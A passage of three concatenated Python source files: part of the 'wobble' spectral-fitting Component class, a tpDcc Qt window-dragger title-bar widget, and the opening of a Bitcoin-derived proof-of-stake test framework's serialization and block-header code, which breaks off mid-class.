regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
Only set if `variable_bases` > 0.
L2_basis_vectors : `float` (default `1`)
L2 regularization amplitude on `self.basis_vectors`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
Only set if `variable_bases` > 0.
L2_basis_weights : `float` (default `0`)
L1 regularization amplitude on `self.basis_weights`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
Only set if `variable_bases` > 0.
Not recommended to change, as this is degenerate with basis vectors.
"""
def __init__(self, name, r, starting_rvs, epoch_mask,
rvs_fixed=False, template_fixed=False, rv_opt_steps = 1,
variable_bases=0, scale_by_airmass=False,
template_xs=None, template_ys=None, initialize_at_zero=False,
learning_rate_rvs=1., learning_rate_template=0.01,
learning_rate_basis=0.01, regularization_par_file=None,
**kwargs):
for attr in ['name', 'r', 'starting_rvs', 'epoch_mask',
'rvs_fixed', 'template_fixed', 'rv_opt_steps',
'template_xs', 'template_ys', 'initialize_at_zero',
'learning_rate_rvs', 'learning_rate_template',
'learning_rate_basis', 'scale_by_airmass']:
setattr(self, attr, eval(attr))
self.K = variable_bases # number of variable basis vectors
self.N = len(starting_rvs)
self.ivars_rvs = np.zeros_like(starting_rvs) + 10. # will be overwritten
regularization_par = ['L1_template', 'L2_template']
if self.K > 0:
regularization_par = np.append(regularization_par,
['L1_basis_vectors', 'L2_basis_vectors', 'L2_basis_weights'])
self.regularization_par = regularization_par # the names of the regularization parameters
default_regularization_par = {'L1_template':0., 'L2_template':0.,
'L1_basis_vectors':0., 'L2_basis_vectors':0.,
'L1_basis_weights':1.}
for par in regularization_par:
if par in kwargs.keys(): # prioritize explicitly set keywords over all else
setattr(self, par, kwargs[par])
elif regularization_par_file is not None: # try setting from file
try:
with h5py.File(regularization_par_file,'r') as f:
setattr(self, par, np.copy(f[par][r]))
except:
print('Regularization parameter file {0} not recognized; \
adopting default values instead.'.format(regularization_par_file))
setattr(self, par, default_regularization_par[par])
else: # if no file & no keyword argument, set to defaults
setattr(self, par, default_regularization_par[par])
def __repr__(self):
return "wobble.Component named {0}".format(self.name)
def setup(self, data, r):
"""Do TensorFlow magic & define likelihoods in prep for optimizing"""
self.starting_rvs[np.isnan(self.starting_rvs)] = 0. # because introducing NaNs to synth will fail
# Make some TENSORS (hell yeah)
self.rvs = tf.Variable(self.starting_rvs, dtype=T, name='rvs_'+self.name)
self.template_xs = tf.constant(self.template_xs, dtype=T, name='template_xs_'+self.name)
self.template_ys = tf.Variable(self.template_ys, dtype=T, name='template_ys_'+self.name)
if self.K > 0:
self.basis_vectors = tf.Variable(self.basis_vectors, dtype=T, name='basis_vectors_'+self.name)
self.basis_weights = tf.Variable(self.basis_weights, dtype=T, name='basis_weights_'+self.name)
self.data_xs = tf.constant(data.xs[r], dtype=T, name='data_xs_'+self.name)
# Set up the regularization
for name in self.regularization_par:
setattr(self, name+'_tensor', tf.constant(getattr(self,name), dtype=T, name=name+'_'+self.name))
self.nll = tf.multiply(self.L1_template_tensor, tf.reduce_sum(tf.abs(self.template_ys)),
name='L1_template_'+self.name)
self.nll = tf.add(self.nll, tf.multiply(self.L2_template_tensor,
tf.reduce_sum(tf.square(self.template_ys)),
name='L2_template_'+self.name),
name='L1_plus_L2_template_'+self.name)
if self.K > 0:
self.nll = tf.add(self.nll, tf.multiply(self.L1_basis_vectors_tensor,
tf.reduce_sum(tf.abs(self.basis_vectors))))
self.nll = tf.add(self.nll, tf.multiply(self.L2_basis_vectors_tensor,
tf.reduce_sum(tf.square(self.basis_vectors))))
self.nll = tf.add(self.nll, tf.multiply(self.L2_basis_weights_tensor,
tf.reduce_sum(tf.square(self.basis_weights))))
# Apply doppler and synthesize component model predictions
shifted_xs = tf.add(self.data_xs, tf.math.log(doppler(self.rvs))[:, None], name='shifted_xs_'+self.name)
inner_zeros = tf.zeros(shifted_xs.shape[:-1], dtype=T)
expand_inner = lambda x: tf.add(x, inner_zeros[..., None], name='expand_inner_'+self.name)
if self.K == 0:
self.synth = interp(shifted_xs,
expand_inner(self.template_xs),
expand_inner(self.template_ys))
else:
full_template = tf.add(self.template_ys[None,:], tf.matmul(self.basis_weights,
self.basis_vectors))
self.synth = interp(shifted_xs, expand_inner(self.template_xs), full_template)
# Apply other scaling factors to model
if self.scale_by_airmass:
self.synth = tf.einsum('n,nm->nm',tf.constant(data.airms, dtype=T), self.synth,
name='airmass_einsum_'+self.name)
#self.synth = tf.add(self.synth, tf.constant(np.log(data.airms[:,None]), dtype=T),
# name=f'airmass_log_add_{self.name}')
A = tf.constant(self.epoch_mask.astype('float'), dtype=T) # identity matrix
self.synth = tf.multiply(A[:,None], self.synth, name='epoch_masking_'+self.name)
#self.synth = tf.einsum('n,nm->nm', A, self.synth, name='epoch_masking_'+self.name)
def initialize_template(self, data_xs, data_ys, data_ivars):
"""Doppler-shift data into component rest frame and average
to make a composite spectrum. Returns residuals after removing this
component from the data.
Must be done BEFORE running `Component.setup()`.
NOTE: if epochs are masked out, this code implicitly relies on their RVs being NaNs.
"""
N = len(self.starting_rvs)
shifted_xs = data_xs + np.log(doppler(self.starting_rvs[:, None], tensors=False)) # component rest frame
if self.template_xs is None:
dx = 2.*(np.log(6000.01) - np.log(6000.)) # log-uniform spacing
tiny = 10.
self.template_xs = np.arange(np.nanmin(shifted_xs)-tiny*dx,
np.nanmax(shifted_xs)+tiny*dx, dx)
if self.template_ys is None:
if self.initialize_at_zero:
template_ys = np.zeros_like(self.template_xs)
else:
template_ys = bin_data(shifted_xs, data_ys, data_ivars, self.template_xs)
self.template_ys = template_ys
self.template_ivars = np.zeros_like(self.template_ys)
full_template = self.template_ys[None,:] + np.zeros((N,len(self.template_ys)))
if self.K > 0:
# initialize basis components
resids = np.empty((np.sum(self.epoch_mask),len(self.template_ys)))
i = 0
for n in range(N): # populate resids with informative epochs
if self.epoch_mask[n]: # this epoch contains the component
resids[i] = np.interp(self.template_xs, shifted_xs[n], data_ys[n]) - self.template_ys
i += 1
u,s,v = np.linalg.svd(resids, compute_uv=True, full_matrices=False)
basis_vectors = v[:self.K,:] # eigenspectra (K x M)
basis_weights = u[:, :self.K] * s[None, :self.K] # weights (N x K)
self.basis_vectors = basis_vectors
# pad out basis_weights with zeros for data epochs not used:
basis_weights_all = np.zeros((len(self.starting_rvs), self.K))
basis_weights_all[self.epoch_mask,:] = basis_weights
self.basis_weights = basis_weights_all
full_template += np.dot(self.basis_weights, self.basis_vectors)
data_resids = np.copy(data_ys)
for n in range(N):
if self.epoch_mask[n]:
data_resids[n] -= np.interp(shifted_xs[n], self.template_xs, full_template[n])
return data_resids
class Continuum(Component):
"""
Polynomial continuum component which is modeled in data space
"""
def __init__(self, r, N, degree, **kwargs):
Component.__init__(self, 'continuum', r, np.zeros(N),
rvs_fixed=True, variable_bases=0, scale_by_airmass=False, **kwargs)
self.degree = degree
def setup(self, data, r):
self.template_xs = tf.constant(self.wavelength_matrix, dtype=T, name='wavelength_matrix_'+self.name)
self.template_ys = tf.Variable(self.weights, dtype=T, name='weights_'+self.name) # HACK to play well with Results
self.rvs = tf.constant(self.starting_rvs, dtype=T, name='rvs_'+self.name) # HACK to play well with Results
self.synth = tf.matmul(self.template_ys, self.template_xs)
self.nll = tf.constant(0., dtype=T) # no regularization
def initialize_template(self, data_xs, data_ys, data_ivars):
assert np.all(data_xs[0] == data_xs[1]), "Continuum failed: wavelength grid must be constant in time"
wavelength_vector = (data_xs[0] - np.mean(data_xs[0]))/(np.max(data_xs[0]) - np.min(data_xs[0]))
self.wavelength_matrix = np.array([wavelength_vector**d for d in range(1,self.degree)]) # D_degrees x M_pixels
self.weights = np.zeros((self.N, self.degree-1)) # N_epochs x D_degrees
return data_ys
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains widgets to to drag PySide windows and dialogs
"""
from __future__ import print_function, division, absolute_import
from Qt.QtCore import Qt, Signal, QPoint, QSize, QTimer
from Qt.QtWidgets import QApplication, QWidget, QFrame, QPushButton
from Qt.QtGui import QPainter
from tpDcc import dcc
from tpDcc.managers import resources
from tpDcc.libs.python import python
from tpDcc.libs.qt.core import qtutils
from tpDcc.libs.qt.widgets import layouts, label, dividers
class WindowDragger(QFrame, object):
"""
Class to create custom window dragger for Solstice Tools
"""
DEFAULT_LOGO_ICON_SIZE = 22
doubleClicked = Signal()
def __init__(self, window=None, on_close=None):
super(WindowDragger, self).__init__(parent=window)
self._window = window
self._dragging_enabled = True
self._lock_window_operations = False
self._mouse_press_pos = None
self._mouse_move_pos = None
self._dragging_threshold = 5
self._minimize_enabled = True
self._maximize_enabled = True
self._on_close = on_close
self.setObjectName('titleFrame')
self.ui()
# =================================================================================================================
# PROPERTIES
# =================================================================================================================
@property
def contents_layout(self):
return self._contents_layout
@property
def corner_contents_layout(self):
return self._corner_contents_layout
# =================================================================================================================
# OVERRIDES
# =================================================================================================================
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton and self._dragging_enabled:
self._mouse_press_pos = event.globalPos()
self._mouse_move_pos = event.globalPos() - self._window.pos()
super(WindowDragger, self).mousePressEvent(event)
def mouseMoveEvent(self, event):
if event.buttons() & Qt.LeftButton:
global_pos = event.globalPos()
if self._mouse_press_pos and self._dragging_enabled:
moved = global_pos - self._mouse_press_pos
if moved.manhattanLength() > self._dragging_threshold:
diff = global_pos - self._mouse_move_pos
self._window.move(diff)
self._mouse_move_pos = global_pos - self._window.pos()
super(WindowDragger, self).mouseMoveEvent(event)
def mouseDoubleClickEvent(self, event):
if self._lock_window_operations:
return
if self._button_maximized.isVisible():
self._on_maximize_window()
else:
self._on_restore_window()
super(WindowDragger, self).mouseDoubleClickEvent(event)
self.doubleClicked.emit()
def mouseReleaseEvent(self, event):
if self._mouse_press_pos is not None:
if event.button() == Qt.LeftButton and self._dragging_enabled:
moved = event.globalPos() - self._mouse_press_pos
if moved.manhattanLength() > self._dragging_threshold:
event.ignore()
self._mouse_press_pos = None
super(WindowDragger, self).mouseReleaseEvent(event)
# =================================================================================================================
# BASE
# =================================================================================================================
def ui(self):
self.setFixedHeight(qtutils.dpi_scale(40))
main_layout = layouts.HorizontalLayout(spacing=2, margins=(5, 0, 5, 0))
self.setLayout(main_layout)
self._logo_button = self._setup_logo_button()
self._setup_logo_button_actions(self._logo_button)
self._title_text = label.ClippedLabel(text=self._window.windowTitle())
self._title_text.setObjectName('WindowDraggerLabel')
self._contents_layout = layouts.HorizontalLayout(spacing=0, margins=(0, 0, 0, 0))
self._corner_contents_layout = layouts.HorizontalLayout(spacing=0, margins=(0, 0, 0, 0))
vertical_separator1 = dividers.get_vertical_separator_widget(parent=self)
vertical_separator2 = dividers.get_vertical_separator_widget(parent=self)
main_layout.addWidget(self._logo_button)
main_layout.addWidget(vertical_separator1)
main_layout.addWidget(self._title_text)
main_layout.addWidget(vertical_separator2)
main_layout.addLayout(self._contents_layout)
main_layout.addStretch()
main_layout.addLayout(self._corner_contents_layout)
self._vertical_separators = [vertical_separator1, vertical_separator2]
self._buttons_widget = QWidget()
self.buttons_layout = layouts.HorizontalLayout(spacing=0, margins=(0, 0, 0, 0))
self.buttons_layout.setAlignment(Qt.AlignRight)
self._buttons_widget.setLayout(self.buttons_layout)
main_layout.addWidget(self._buttons_widget)
self._button_minimized = QPushButton()
self._button_minimized.setIconSize(QSize(25, 25))
# self._button_minimized.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_minimized.setIcon(resources.icon('minimize', theme='window'))
self._button_minimized.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_maximized = QPushButton()
self._button_maximized.setIcon(resources.icon('maximize', theme='window'))
# self._button_maximized.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_maximized.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_maximized.setIconSize(QSize(25, 25))
self._button_restored = QPushButton()
# self._button_restored.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_restored.setVisible(False)
self._button_restored.setIcon(resources.icon('restore', theme='window'))
self._button_restored.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_restored.setIconSize(QSize(25, 25))
self._button_closed = QPushButton()
# button_closed.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_closed.setIcon(resources.icon('close', theme='window'))
self._button_closed.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_closed.setIconSize(QSize(25, 25))
self.buttons_layout.addWidget(self._button_minimized)
self.buttons_layout.addWidget(self._button_maximized)
self.buttons_layout.addWidget(self._button_restored)
self.buttons_layout.addWidget(self._button_closed)
self._button_maximized.clicked.connect(self._on_maximize_window)
self._button_minimized.clicked.connect(self._on_minimize_window)
self._button_restored.clicked.connect(self._on_restore_window)
self._button_closed.clicked.connect(self._on_close_window)
def set_icon(self, icon=None, highlight=False):
"""
Sets the icon of the window dragger
:param icon: QIcon
:param highlight: bool
"""
icon = icon or self._window.windowIcon()
if icon and python.is_string(icon):
icon = resources.icon(icon)
if not icon or icon.isNull():
icon = resources.icon('tpDcc')
size = self.DEFAULT_LOGO_ICON_SIZE
if highlight:
self._logo_button.set_icon(
[icon], colors=[None], tint_composition=QPainter.CompositionMode_Plus, size=size,
icon_scaling=[1], color_offset=0, grayscale=True)
else:
self._logo_button.set_icon([icon], colors=None, size=size, icon_scaling=[1], color_offset=0)
self._logo_button.set_icon_idle(icon)
# self._lbl_icon.setPixmap(icon.pixmap(icon.actualSize(QSize(24, 24))))
def set_icon_hover(self, icon=None):
"""
Sets the icon hover of the window dragger
:param icon: QIcon
"""
icon = icon or self._window.windowIcon()
if icon and python.is_string(icon):
icon = resources.icon(icon)
if not icon or icon.isNull():
icon = resources.icon('tpDcc')
self._logo_button.set_icon_hover(icon)
def set_height(self, value):
"""
Sets the size of the dragger and updates icon
:param value: float
"""
self.setFixedHeight(qtutils.dpi_scale(value))
def set_title(self, title):
"""
Sets the title of the window dragger
:param title: str
"""
self._title_text.setText(title)
def set_dragging_enabled(self, flag):
"""
Sets whether or not drag functionality is enabled
:param flag: bool
"""
self._dragging_enabled = flag
def set_minimize_enabled(self, flag):
"""
Sets whether dragger shows minimize button or not
:param flag: bool
"""
self._minimize_enabled = flag
self._button_minimized.setVisible(flag)
def set_maximized_enabled(self, flag):
"""
Sets whether dragger shows maximize button or not
:param flag: bool
"""
self._maximize_enabled = flag
self._button_maximized.setVisible(flag)
def show_logo(self):
"""
Shows window logo
"""
self._logo_button.setVisible(True)
def hide_logo(self):
"""
Hides window logo
"""
self._logo_button.setVisible(False)
def set_window_buttons_state(self, state, show_close_button=False):
"""
Sets the state of the dragger buttons
:param state: bool
:param show_close_button: bool
"""
self._lock_window_operations = not state
self._button_closed.setEnabled(state or show_close_button)
self._button_closed.setVisible(state or show_close_button)
if self._maximize_enabled:
self._button_maximized.setEnabled(state)
self._button_maximized.setVisible(state)
else:
self._button_maximized.setEnabled(False)
self._button_maximized.setVisible(False)
if self._minimize_enabled:
self._button_minimized.setEnabled(state)
self._button_minimized.setVisible(state)
else:
self._button_minimized.setEnabled(False)
self._button_minimized.setVisible(False)
if not state:
self._button_restored.setEnabled(state)
self._button_restored.setVisible(state)
else:
if self.isMaximized():
self._button_restored.setEnabled(state)
self._button_restored.setVisible(state)
def set_frameless_enabled(self, frameless=False):
"""
Enables/Disables frameless mode or OS system default
:param frameless: bool
"""
from tpDcc.managers import tools
tool_inst = tools.ToolsManager().get_tool_by_plugin_instance(self._window)
if not tool_inst:
return
offset = QPoint()
if self._window.docked():
rect = self._window.rect()
pos = self._window.mapToGlobal(QPoint(-10, -10))
rect.setWidth(rect.width() + 21)
self._window.close()
else:
rect = self.window().rect()
pos = self.window().pos()
offset = QPoint(3, 15)
self.window().close()
tool_inst._launch(launch_frameless=frameless)
new_tool = tool_inst.latest_tool()
QTimer.singleShot(
0, lambda: new_tool.window().setGeometry(
pos.x() + offset.x(), pos.y() + offset.y(), rect.width(), rect.height()))
new_tool.framelessChanged.emit(frameless)
QApplication.processEvents()
return new_tool
def _setup_logo_button(self):
"""
Internal function that setup window dragger button logo
:return: IconMenuButton
"""
# To avoid cyclic imports
from tpDcc.libs.qt.widgets import buttons
logo_button = buttons.IconMenuButton(parent=self)
logo_button.setIconSize(QSize(24, 24))
logo_button.setFixedSize(QSize(30, 30))
logo_button.set_menu_align(Qt.AlignLeft)
return logo_button
def _setup_logo_button_actions(self, logo_button):
"""
Internal function that setup window dragger button logo actions
"""
if not logo_button:
return
self._toggle_frameless = logo_button.addAction(
'Toggle Frameless Mode', connect=self._on_toggle_frameless_mode, checkable=True)
self._toggle_frameless.setChecked(self._window.is_frameless())
if dcc.is_maya() and dcc.get_version() >= 2022:
self._toggle_frameless.setText('Toggle Frameless Mode (not available)')
self._toggle_frameless.setEnabled(False)
def _on_toggle_frameless_mode(self, action):
"""
Internal callback function that is called when switch frameless mode button is pressed by user
:param flag: bool
"""
self.set_frameless_enabled(action.isChecked())
def _on_maximize_window(self):
"""
Internal callback function that is called when the user clicks on maximize button
"""
self._button_restored.setVisible(True)
self._button_maximized.setVisible(False)
self._window.setWindowState(Qt.WindowMaximized)
def _on_minimize_window(self):
"""
Internal callback function that is called when the user clicks on minimize button
"""
self._window.setWindowState(Qt.WindowMinimized)
def _on_restore_window(self):
"""
Internal callback function that is called when the user clicks on restore button
"""
self._button_restored.setVisible(False)
self._button_maximized.setVisible(True)
self._window.setWindowState(Qt.WindowNoState)
def _on_close_window(self):
"""
Internal callback function that is called when the user clicks on close button
"""
from tpDcc.managers import tools
closed = False
if hasattr(self._window, 'WindowId'):
closed = tools.ToolsManager().close_tool(self._window.WindowId, force=False)
if not closed:
if hasattr(self._window, 'docked'):
if self._window.docked():
self._window.fade_close()
else:
self.window().fade_close()
else:
self._window.fade_close()
class DialogDragger(WindowDragger, object):
def __init__(self, parent=None, on_close=None):
super(DialogDragger, self).__init__(window=parent, on_close=on_close)
for btn in [self._button_maximized, self._button_minimized, self._button_restored]:
btn.setEnabled(False)
btn.setVisible(False)
def mouseDoubleClickEvent(self, event):
return
def _setup_logo_button(self):
"""
Internal function that setup window dragger button logo
:return: IconMenuButton
"""
# To avoid cyclic imports
from tpDcc.libs.qt.widgets import buttons
logo_button = buttons.IconMenuButton(parent=self)
logo_button.setIconSize(QSize(24, 24))
logo_button.setFixedSize(QSize(30, 30))
return logo_button
|
#!/usr/bin/env python3
# Copyright (c) 2010 ArtForz -- public domain half-a-node
# Copyright (c) 2012 Jeff Garzik
# Copyright (c) 2010-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Bitcoin test framework primitive and message strcutures
CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....:
data structures that should map to corresponding structures in
bitcoin/primitives
msg_block, msg_tx, msg_headers, etc.:
data structures that represent network messages
ser_*, deser_*: functions that handle serialization/deserialization."""
from codecs import encode
import copy
import hashlib
from io import BytesIO
import random
import socket
import struct
import time
from test_framework.siphash import siphash256
from test_framework.util import hex_str_to_bytes, bytes_to_hex_str
MIN_VERSION_SUPPORTED = 60001
MY_VERSION = 70914 # past bip-31 for ping/pong
MY_SUBVERSION = b"/python-mininode-tester:0.0.3/"
MY_RELAY = 1 # from version 70001 onwards, fRelay should be appended to version messages (BIP37)
MAX_INV_SZ = 50000
MAX_BLOCK_BASE_SIZE = 1000000
COIN = 100000000 # 1 btc in satoshis
NODE_NETWORK = (1 << 0)
# NODE_GETUTXO = (1 << 1)
NODE_BLOOM = (1 << 2)
# Serialization/deserialization tools
def sha256(s):
return hashlib.new('sha256', s).digest()
def ripemd160(s):
return hashlib.new('ripemd160', s).digest()
def hash256(s):
return sha256(sha256(s))
def ser_compact_size(l):
r = b""
if l < 253:
r = struct.pack("B", l)
elif l < 0x10000:
r = struct.pack("<BH", 253, l)
elif l < 0x100000000:
r = struct.pack("<BI", 254, l)
else:
r = struct.pack("<BQ", 255, l)
return r
def deser_compact_size(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
return nit
def deser_string(f):
nit = deser_compact_size(f)
return f.read(nit)
def ser_string(s):
return ser_compact_size(len(s)) + s
def deser_uint256(f):
r = 0
for i in range(8):
t = struct.unpack("<I", f.read(4))[0]
r += t << (i * 32)
return r
def ser_uint256(u):
rs = b""
for i in range(8):
rs += struct.pack("<I", u & 0xFFFFFFFF)
u >>= 32
return rs
def ser_uint64(u):
rs = b""
for i in range(2):
rs += struct.pack("<I", u & 0xFFFFFFFF)
u >>= 32
return rs
def uint256_from_str(s):
r = 0
t = struct.unpack("<IIIIIIII", s[:32])
for i in range(8):
r += t[i] << (i * 32)
return r
def uint256_from_compact(c):
nbytes = (c >> 24) & 0xFF
v = (c & 0xFFFFFF) << (8 * (nbytes - 3))
return v
def deser_vector(f, c):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = c()
t.deserialize(f)
r.append(t)
return r
# ser_function_name: Allow for an alternate serialization function on the
# entries in the vector (we use this for serializing the vector of transactions
# for a witness block).
def ser_vector(l, ser_function_name=None):
r = ser_compact_size(len(l))
for i in l:
if ser_function_name:
r += getattr(i, ser_function_name)()
else:
r += i.serialize()
return r
def deser_uint256_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = deser_uint256(f)
r.append(t)
return r
def ser_uint256_vector(l):
r = ser_compact_size(len(l))
for i in l:
r += ser_uint256(i)
return r
def deser_string_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = deser_string(f)
r.append(t)
return r
def ser_string_vector(l):
r = ser_compact_size(len(l))
for sv in l:
r += ser_string(sv)
return r
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(hex_str_to_bytes(hex_string)))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
return bytes_to_hex_str(obj.serialize())
# Objects that map to bitcoind objects, which can be serialized/deserialized
class CAddress():
def __init__(self):
self.nServices = 1
self.pchReserved = b"\x00" * 10 + b"\xff" * 2
self.ip = "0.0.0.0"
self.port = 0
def deserialize(self, f):
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.pchReserved = f.read(12)
self.ip = socket.inet_ntoa(f.read(4))
self.port = struct.unpack(">H", f.read(2))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nServices)
r += self.pchReserved
r += socket.inet_aton(self.ip)
r += struct.pack(">H", self.port)
return r
def __repr__(self):
return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices,
self.ip, self.port)
class CInv():
typemap = {
0: "Error",
1: "TX",
2: "Block",
}
def __init__(self, t=0, h=0):
self.type = t
self.hash = h
def deserialize(self, f):
self.type = struct.unpack("<i", f.read(4))[0]
self.hash = deser_uint256(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.type)
r += ser_uint256(self.hash)
return r
def __repr__(self):
return "CInv(type=%s hash=%064x)" \
% (self.typemap[self.type], self.hash)
class CBlockLocator():
def __init__(self):
self.nVersion = MY_VERSION
self.vHave = []
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vHave = deser_uint256_vector(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256_vector(self.vHave)
return r
def __repr__(self):
return "CBlockLocator(nVersion=%i vHave=%s)" \
% (self.nVersion, repr(self.vHave))
class COutPoint():
def __init__(self, hash=0, n=0):
self.hash = hash
self.n = n
def deserialize(self, f):
self.hash = deser_uint256(f)
self.n = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += ser_uint256(self.hash)
r += struct.pack("<I", self.n)
return r
def __repr__(self):
return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n)
class CTxIn():
def __init__(self, outpoint=None, scriptSig=b"", nSequence=0):
if outpoint is None:
self.prevout = COutPoint()
else:
self.prevout = outpoint
self.scriptSig = scriptSig
self.nSequence = nSequence
def deserialize(self, f):
self.prevout = COutPoint()
self.prevout.deserialize(f)
self.scriptSig = deser_string(f)
self.nSequence = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += self.prevout.serialize()
r += ser_string(self.scriptSig)
r += struct.pack("<I", self.nSequence)
return r
def __repr__(self):
return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \
% (repr(self.prevout), bytes_to_hex_str(self.scriptSig),
self.nSequence)
class CTxOut():
def __init__(self, nValue=0, scriptPubKey=b""):
self.nValue = nValue
self.scriptPubKey = scriptPubKey
def deserialize(self, f):
self.nValue = struct.unpack("<q", f.read(8))[0]
self.scriptPubKey = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<q", self.nValue)
r += ser_string(self.scriptPubKey)
return r
def __repr__(self):
return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \
% (self.nValue // COIN, self.nValue % COIN,
bytes_to_hex_str(self.scriptPubKey))
class CTransaction():
def __init__(self, tx=None):
if tx is None:
self.nVersion = 1
self.vin = []
self.vout = []
self.nLockTime = 0
self.sha256 = None
self.hash = None
else:
self.nVersion = tx.nVersion
self.vin = copy.deepcopy(tx.vin)
self.vout = copy.deepcopy(tx.vout)
self.nLockTime = tx.nLockTime
self.sha256 = tx.sha256
self.hash = tx.hash
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vin = deser_vector(f, CTxIn)
flags = 0
if len(self.vin) == 0:
flags = struct.unpack("<B", f.read(1))[0]
# Not sure why flags can't be zero, but this
# matches the implementation in bitcoind
if (flags != 0):
self.vin = deser_vector(f, CTxIn)
self.vout = deser_vector(f, CTxOut)
else:
self.vout = deser_vector(f, CTxOut)
self.nLockTime = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize_without_witness(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
r += struct.pack("<I", self.nLockTime)
return r
# Regular serialization is with witness -- must explicitly
# call serialize_without_witness to exclude witness data.
def serialize(self):
return self.serialize_without_witness()
# Recalculate the txid (transaction hash without witness)
def rehash(self):
self.sha256 = None
self.calc_sha256()
# We will only cache the serialization without witness in
# self.sha256 and self.hash -- those are expected to be the txid.
def calc_sha256(self, with_witness=False):
if self.sha256 is None:
self.sha256 = uint256_from_str(hash256(self.serialize_without_witness()))
self.hash = encode(hash256(self.serialize_without_witness())[::-1], 'hex_codec').decode('ascii')
def is_valid(self):
self.calc_sha256()
for tout in self.vout:
if tout.nValue < 0 or tout.nValue > 21000000 * COIN:
return False
return True
def __repr__(self):
return "CTransaction(nVersion=%i vin=%s vout=%s nLockTime=%i)" \
% (self.nVersion, repr(self.vin), repr(self.vout), self.nLockTime)
class CBlockHeader():
def __init__(self, header=None):
if header is None:
self.set_null()
else:
self.nVersion = header.nVersion
self.hashPrevBlock = header.hashPrevBlock
self.hashMerkleRoot = header.hashMerkleRoot
self.nTime = header.nTime
self.nBits = header.nBits
self.nNonce = header.nNonce
self.nAccumulatorCheckpoint = header.nAccumulatorCheckpoint
self.sha256 = header.sha256
self.hash = header.hash
self.calc_sha256()
def set_null(self):
self.nVersion = 4
self.hashPrevBlock = 0
self.hashMerkleRoot = 0
self.nTime = 0
self.nBits = 0
self.nNonce = 0
self.nAccumulatorCheckpoint = 0
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.hashPrevBlock = deser_uint256(f)
self.hashMerkleRoot = deser_uint256(f)
self.nTime = struct.unpack("<I", f.read(4))[0]
self.nBits = struct.unpack("<I", f.read(4))[0]
self.nNonce = struct.unpack("<I", f.read(4))[0]
self.nAccumulatorCheckpoint = deser_uint256(f)
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
r += ser_uint256(self.nAccumulatorCheckpoint)
return r
def calc_sha256(self):
if self.sha256 is None:
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
r += ser_uint256(self.nAccumulatorCheckpoint)
self.sha256 = uint256_from_str(hash256(r))
self.hash = encode(hash256(r)[::-1], 'hex_codec').decode('ascii')
def rehash(self):
self.sha256 = None
self.calc_sha256()
return self.sha256
# BLES Uniqueness
def get_uniqueness(self, prevout):
r = b""
r += struct.pack("<I", prevout.n)
r += ser_uint256(prevout.hash)
return r
def solve_stake(self, prevouts):
target0 = uint256_from_compact(self.nBits)
loop = True
while loop:
for prevout in prevouts:
nvalue, txBlockTime, stakeModifier, hashStake = prevouts[prevout]
target = int(target0 * nvalue / 100) % 2**256
data = b""
data += ser_uint64(stakeModifier)
data += struct.pack("<I", txBlockTime)
# prevout for zPoS is serial hashes hex strings
if isinstance(prevout, COutPoint):
data += self.get_uniqueness(prevout)
else:
data += ser_uint256(uint256_from_str(bytes.fromhex(hashStake)[::-1]))
data += struct.pack("<I", self.nTime)
posHash = uint256_from_str(hash256(data))
if posHash <= target:
self.prevoutStake = prevout
loop = False
break
if loop:
self.nTime += 1
return True
def __repr__(self):
